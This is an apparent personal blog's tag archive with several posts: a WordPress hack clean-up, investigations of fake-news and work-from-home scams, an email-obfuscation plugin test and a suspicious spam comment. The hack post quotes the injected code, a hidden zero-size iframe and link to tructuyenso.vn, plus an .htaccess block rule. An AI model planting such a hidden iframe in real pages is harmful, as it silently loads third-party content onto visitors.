Tag Archive: Source Code

Hacked – I was a possible Malware Site for tructuyenso.vn!

Introduction

A few days ago I got hacked.  I quickly ripped out a heap of dodgy files left by the hackers but for some days now, Firefox, my browser, while viewing pages on this website, has been saying that it’s “downloading data from tructuyenso.vn… “.

.htaccess

This, of course, was not actually happening, as I’ve put the blockers on the whole of Vietnam using .htaccess!  The reason for this is that initially, tructuyenso wasn’t the only site appearing in the progress tip – there was another which lasted until I got rid of the various files dumped on my website.  This is how:

<Limit GET POST>
order allow,deny
deny from 112.0.0.0/8
allow from all
</Limit>

However, the call was still being made from somewhere on my site as the progress indicator wouldn’t stop….

Site5 Search

A search for the string “tructuyenso.vn” turned up nothing in the files on my website using my website host’s file manager.  (In the end, this was my failing and I will not rely on the thing again!)

A search through my database also turned up zero.

TCPView

TCPView is a download from Sysinternals.com  (now Microsoft!) that shows the various net connections being made to one’s PC from everywhere.  This immediately showed that as soon as the main strangelyperfect.tv website (not the backend WordPress admin area), fired up in Firefox, as many as 7 connections were simultaneously made to 112.78.15.230……  This is the IP address that holds tructuyenso.vn, plus 11 other domains, some of which I’d seen flash through the progress bar.

Even when closed by TCPView, the connections would immediately start up again to the same IP address, 112.78.15.230  (manually closing strangelyperfect.tv stopped the connections).

Reverse IP on tructuyenso.vn

Reverse IP on tructuyenso.vn

YouGetSignal.com shows the domains up nicely in the screenshot above..

Result!

Finding nowt anywhere and Google searches providing zilch on the website in question except in Vietnamese, I turned to the WordPress Codex, specifically, https://codex.wordpress.org/FAQ_My_site_was_hacked

I had of course previously changed my FTP, mySQL databaase and site management passwords, but the link at the bottom to a Website malware & blacklist scan (Sucuri) was the killer!  On visiting Sucuri, it instantly said that I was acting as a host for malware and gave the offending results, for free! (Of course, I wasn’t hosting malware – just that it gave an indication that I was and hence the slowness of the site to load as it tried and failed to download shite my way from Vietnam)

This is their take on it: http://sucuri.net/malware/malware-entry-mwiframehd202

Final Cause and Clean Up

Checking the source code for my homepage (which in retrospect I should have done first!!) threw up “tructuyenso.vn” right at the very bottom.  This is the code as it was when I checked:

<a href="http://tructuyenso.vn" title="Quang cao truc tuyen | Ban hang truc tuyen | Dien dan quang cao truc tuyen" > Quang cao truc tuyen</a>
<iframe marginWidth="0" marginHeight="0" frameBorder="0" width="0" height="0" bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" nosize scrolling="no" src="http://tructuyenso.vn/"></iframe>
</body>
</html>

This was then easily traced to the footer.php file in my theme, Suffusion.

It was simply stripped out and the website then worked fine…..  but to be sure, I have downloaded then checked the footer file in a fresh theme download to be sure – it’s clean!  I then uploaded a whole clean Suffusion theme in it’s entirety just in case any other theme files were compromised during the original hack yet were dormant, waiting for a trigger.

A recheck on Securi shows my website to be okay now.  See screendump below.   I’ll be using Securi  a lot more!

Securi Site Check

Securi Site Check

Related Posts:

Comments are closed

Windows Defrag to News 9 Today Browser Scam

Free Windows Defragmenter Search

Take this for a scam and a half way of fixing the Google search results!

Defrag Search Results

Defrag Search Results

Today I was looking for an old defrag program, but couldn’t remember the name – so I went to Google.  That’s the screenshot on the right.

The second result looked promising.  After all, the text says,

Anyone know what is currently the best defragmenter for Windows 7 x64 64 bit, and why? Does it have any problems?

News 9 Today  (news9today.org)

News9 Today

News9 Today

Unfortunately, tehparadox.com is not all it seems.  The page actually referenced is http://tehparadox.com/forum/f85/best-defragmenter-windows-7-x64-452359/, which looks kosher enough, but it has nothing at all to do with disc defragmenters, and everything to do with get rich quick schemes!! (That is a screenshot on the left).

It’s like all the other fake news sites that we’ve seen recently, except in this case, the whole meta data of the website is built to deceive the search engines!

For instance, the title stays in the browser tabs, saying,

“Best defragmenter for Windows 7 x64 64 bit?”

The whole html source code is here.  You’ll see that the meta data bit reads:

name=”keywords” content=”Best,defragmenter,Windows,7,x64,64,bit, Best defragmenter for Windows 7 x64 64 bit?, downloads,free,resources,online,sharing,community,movies,games,720p,1080p,anime,applications,music,tv shows,e-books,comic books,discussions,warez,dvdr,rapidshare,megaupload,netload,hotfile,fileserve,filesonic”

name=”description” content=”Anyone know what is currently the best defragmenter for Windows 7 x64 64 bit, and why? Does it have any problems? Or should I just use the default one that comes with Windows 7? Thanks.”

Where Does it Point?

The links all go to

https://ssl.clickbank.net/order/restricted.html?errCode=accntstate&cbhopvendor=homejonlin

which then redirects to

http://www.home-online-jobs.org/check-positions-available/?hop=maspromo

WHOIS www.home-online-jobs.org

Well, they’re hidden of course.  You should know what I think of businesses that choose to be anonymous, but to repeat, I think they’re shite.  See ‘http://whois.domaintools.com/home-online-jobs.org for their “details”.

Noticeably, they have very peculiar name servers:

Name Server:NS1.MYHOMEWEALTHSYSTEM.COM

Name Server:NS2.MYHOMEWEALTHSYSTEM.COM

MYHOMEWEALTHSYSTEM.COM

This bunch of jokers are also hidden, see ‘http://whois.domaintools.com/myhomewealthsystem.com but they Do have an actual web page promoting much the same stuff.  This has been seriously debunked by Paul at WorkAtHomeTruth here back in March 2010.  He has more red flags than the semaphore kid going on it.

The Biggest Killer Laugh of All

News9TodaySmallPrint

News9 Today Small Print

MyHomeWealthSystem at least has a web page.

Now go back to the top and examine News9Today.  Down at the bottom of their small print, they say:

Copyright 2010 © News9Today.org All Rights Reserved.

Hmm?  A website URL.  I wonder what it looks like?

Well actually, if you can recall the CNN logos at the top of the page, like so (directly from their server):

Tehparadox

As seen on CNN? Ha Ha!

After getting the link to the header image above which is sourced from http://www.news9today.org/home-job-news/index_files/features16.jpg, I back-spaced to go back to the News9 Today page – and ended up on the tehparadox page here:  http://tehparadox.com/forum/f85/best-defragmenter-windows-7-x64-452359/

You see in the screenshot that the top advert is a “Google Is Hiring” scam advert?  Where does it go?

A. Well http://www.news9today.org/home-online-job-positions/?tid=hojab6 of course!

Conclusion

Somehow the browser has been redirected from the Google search page to the header advert from the tehparadox website.  This could be SQL injection or a bug in their server or my browser setup.

Whatever, this really stinks, and it’s a new thing to be wary about.

Related Posts:

ScamVictimHelp.com, Poacher turned Gamekeeper?

Introduction

Poacher turned Gamekeeper

a gun

Poacher or Gamekeeper?

I’ve been rss following a little thread where a job-seeking homeworker has been diddled out of thousands – see Saundrak’s Blog. It seems to have close ties to Pacific Webworks et al, maybe not directly, but the Golf Course, techniques,  or something.

Read this curious comment from someone called mlwood79 that just doesn’t look right to me, following my experiences with the scammers double-bluff etc in the old Google Treasure Chest scam.

Tracing mlwood79?

It’s not hard and doesn’t take long.  Despite not leaving any open invitation, Matt Wood leaves his email and phone number here, http://mlwood79.blogspot.co.uk/, a single post on the free blogger web.

A similar search on the 877-725-8882 phone number pulls out something interesting.  For instance, there are these postings on various consumer/scam forums:

www.scamvictimhelp.com

Very quickly we end up at scamvictimhelp.com from these few links above.  They provide a fair bit of information.

225/365 - scam

Another Scam or Two?

scamvictimhelp.com is a very plush and professional looking site, with an opening video that put the colley-wobbles up me after my Robert G Allen experiences and the various Robert Millar video offerings. (see here for instance).

But the wordage is re-assuring enough, textually and on the video.  They seem to be White Knights, offering help to people who’ve been scammed by the recent splurge of Google/Tree/Credit stuff.

(On the subject of White Knights, Paul at WorkAtHomeTruth has had a separate rant that hints at the scammer’s double-bluffing we’ve previously observed.  Their new twists around old habits know no bounds!  Either that or piss-poor altruism.)  Who was it who said ‘eternal vigilance’?

Q. So Who are ScamVictimHelp.com?

A. Now there’s the rub!  USA folks will know the 877 phone number is non-geographic and a free-phone (see phone info).  The contact on the website is (like this one), a simple contact form.  So I don’t know where they are, from that! Hmm?

Q. So WHOIS ScamvictimHelp.com?

A. And there’s another rub!  Their name is ‘protected’ just like the scammers’, by Domains by Proxy, Inc. So I don’t know where they are from that! This facility is ‘supposed’ to be used to “protect individuals from spam”, but the reality for me is that,

if someone, offering a service, wants to hide their identity, then they’re up to no good!!!

Other Inconsistencies

So we see they want to hide themselves.   But from examining their website and some other forum postings (a weird way to advertise, is it not?), I’ve got three email contacts for the company:

  • Matt Wood – [email protected]
  • via spam reported here[email protected]
  • same email address is on http://www.scamvictimhelp.com/ homepage
  • Tyler Jackson – [email protected]

This means that they’re hiding their detail not because they don’t want to be spammed, but for another reason

By the way, I use email obfuscation on this website provided by Mike Greenberg ‘s phpEnkoder, which makes it almost impossible for content scraping robots to harvest email addresses for spam purposes.  Many sites use a similar technique….   but looking at their page source code, scamvictimhelp just use the simple mailto: html directive, which means that their email addresses can be harvested, but since the main one arrived in someone’s spam anyway, they don’t care about that, obviously.

You’ve got to really question their motives now…

Q. But What About ScamVictimHelp.com?

A. Well the best thing is to quote their stuff straight from their ‘About’ page (my emphasis below)…

We at ScamVictimHelp.com have a combined work experience of 25 years in the work-from-home/home based business industry. We have owned and operated back end telesales call centers for the majority of those years. Selling products, services, and personal coaching, designed to teach people how to make money from home through the internet, vending, stock market investing, real estate, and everything else in between. In which, we generated over 30 million dollars in sales revenue.

So they are a sales force organisation!  And I still don’t know where they are from that! Like I said at the beginning, poacher turned gamekeeper?  hmm…?  (Ironically, my original hook into this, Saundrak,  was because she was conned by a ‘personal coaching service’!!)

The best bit is in their very short Terms page.  Basically, they’ve stripped out all the reams of disclaimers and obfuscated money arrangements from the usual scammer T&Cs, and said that if you do happen to take up an offer from the website, all the results are from your work, and they can’t be blamed for anything…   the key scammer phrase of ‘opportunity seeker’ also pops up, like a bent penny.   Look! ….here’s what they say, so make up your own mind:

Any business opportunity related programs approved or recommended by Scam Victim Help.com, LLC on this site still require a sincere effort and patience on the part of the opportunity seeker. Since your results depend on the effort you apply to your business; individual results may vary

And I still don’t know where they are from that! Is this still poacher turned gamekeeper?  hmmm…?

Conclusion

If you’ve read some of the links listed above, you’ll have gathered that there’s a lot of uncertainty about this company.  Currently, from my limited research, no-one seems prepared to say right out that they’re up to no good.

But for my money, unless I start seeing some very positive reports and a lot more openness, I’d need a very large bargepole before I’d approach them.  Now where do you get barge-poles…?  Ha Ha.

Update 3 Nov 2009

Send in the Clones

Send in the Clones

The Vowells mentioned in the comments below have a host of businesses and put a lot into their local community.  Apart from the permanently dead car sales place previously at http://www.stgeorgechamber.com/New%20Members/executive.car.sales.htm, they have oil wells in Texas and a never-ending supply of internet-based ideas, like we’ve found.  Their former business www.oilinvestorsonline.com seems to be no more, at least in the internet world.

Whois Capital Energy Corp

Whois Capital Energy Corp

Capital Energy Corp is still going though, and, unusually, unlike the St George Runners Baseball team who’ve cloaked their identity behind DomainsByProxy, are still visible to a WHOIS query!

Whois Intelligent Marketing

Whois Intelligent Marketing

Curiously, since I checked a month or two back on the Baseball website, a lot of contact details have disappeared from the website.  I can understand the Vowell’s reasons….

But hey-ho.  There’s another Todd Vowell at a company called www.intelligentmarketing.com, in Cally-Forny-I-A!  But y’know, it may not be the same guy (Paul at WorkAtHomeTruth always treats such info with circumspection as he says in the comments below), but it’s quite a co-incidence, especially since my OpenDNS blocked the website right off because it’s classified as “Adware”!

Use OpenDNS
Same as this link here about a business disagreement…

Related Posts:

Test of PHPEnkoder

Strangely post on May 16th, 2009
Posted in Technology Tags: , , , , , , , , , ,

PHPEnkoder is a port of the excellent Hivelogic Enkoder to PHP and, more specifically, to WordPress. It is used to display text in a way that users can see and bots can’t.

The encoding system is directly and unabashedly stolen from the BSD-licensed source of Hivelogic Enkoder, which works by randomly encoding a piece of text and sending to the browser self-evaluating Javascript that will generate the original text. This works in two ways: first, a bot must first have a fairly complete Javascript implementation; second, the decoding process can be made arbitrarily computationally intensive. This is similar to the idea of charging computational payments to send e-mail, only this is actually implemented.

email address could be here.  The plugin obfuscates it with JavaScript.  It works well and as designed, hiding the email address in the page source code but showing it to JavaScript enabled browsers.  So I’m leaving it in for now to protect the odd person who floats their email address into comments….

I’ve taken my spammer’s email honeypot address away.

Related Posts:

Comments are closed

Google Treasure Chest, or Kit, and Mysterious ‘Help’ from a Stranger

Pre-Script

Comments are now closed on this posting as Google Treasure Chest is dead.
However, the problem has not gone away – the menace continues.

For further information, all chat on this and subsequent scams is now here:
Google Revolution, Different Name, Same Scam!
and here:
More on Google Profits and Pacific Webworks/

Google Treasure Chest

The saga that is Google Treasure Chest in all it’s various incarnations took an unusual turn the other day and it’s only now I’ve got round to writing about it.  For completeness, this is part of the story documented in these three links (and the shrapnel emanating!)

Google Adsense

The unusual problem is to do with this comment on the Google Treasure Chest – it’s a scam and a half! posting.

http://strangelyperfect.tv/3099/google-treasure-chest-its-a-scam-and-a-half/#comment-1176

It’s from a guy named ‘jeff’.  The IP address is put down as somewhere in Alaska and the email address is a gmail.com one.  The problem is the wordage and content of the comment, because notionally it looks okay.  It says;

Strangely Perfect has a link to this scam:
googleads.g.doubleclick.net/aclk?sa=l&ai=BztmIm33nSc_wF5uorAPAz9S1ApethJcBx4WBrwzAjbcB4L40EAEYAiCPg6QOKAI4AFC7seKP
_v____8BYMnmp4a0o6AXoAGdjMruA7IBE3N0cmFuZ2VseXBlcmZlY3QudHa6AQk0Njh4NjBfYXP
IAQHaAUxodHRwOi8vc3RyYW5nZWx5cGVyZmVjdC50di8zMDk5L2dvb2dsZS10cmVhc3VyZS1j
aGVzdC1pdHMtYS1zY2FtLWFuZC1hLWhhbGYv4AECqQK39pSQk9irPqgDAcgDB-gDYegDyAL1A
wAAAAT1AwBAAAA&num=2&sig=AGiWqty_8Dkk4B5fCXsxHe4HgUcV1MOm5w
&client=ca-pub-0574746273596969&adurl=http://www.trackednet.com/statistics/ngm/&nm=33

@AmazonI’ve stripped off the http’ and addded carriage returns to the query string otherwise it shoots right across the page, and even worse, it would allow the link to run.

What’s interesting is that somehow ‘jeff’ has managed (or bothered?) to add a adsense link with my google adsense reference number.  Now this isn’t hard to find.  Check the source code for any of my pages and they’ll all contain the code as a google ad is on every page as they are in the sidebar.

In other words – it’s not rocket science.

But why would someone want to do that?  The actual text is “Strangely Perfect has a link to this scam”, followed by a link.

But the comment is on the actual post where the actual Google Treasure Chest scam is dug into.

  • Q.  So where does the actual link point to?
  • A.  Not where you think – is the answer!

The end URL, http://www.trackednet.com/statistics/ngm/&nm=33 is a 404 dead end.  The front query string is also dead.  Only when the link is clicked (and I’m credited, bizarrely), does the link take you anywhere and that place is a redirect from trackednet.com via a ‘Go’ page to:

http://www.entrepreneur.com/topic/home-based-business

This is a California based company and is in a very nice glazed building off the San Diego Freeway.

Confused

So I’m a trifle confused.  What’s this comment doing on the post?  It’s a kind of self-referential hell.  Is it a mistake by ‘jeff’ who posted the comment on the wrong website?  Is it part of a link duffing-up process?  Is it people posting extra links back to their site on popular posts to ensure the link stands out and isn’t in with the normal bunch of links?

When ‘jeff’ said “Strangely Perfect has a link to this scam”, it’s as if he’s coppied a link from my sidebar adverts and pasted it into a comment……   I hope it’s a genuine mistake and not some new ‘thing’ that I’m at present unaware of!

Related Posts:

© 2007-2017 Strangely Perfect All Rights Reserved -- Copyright notice by me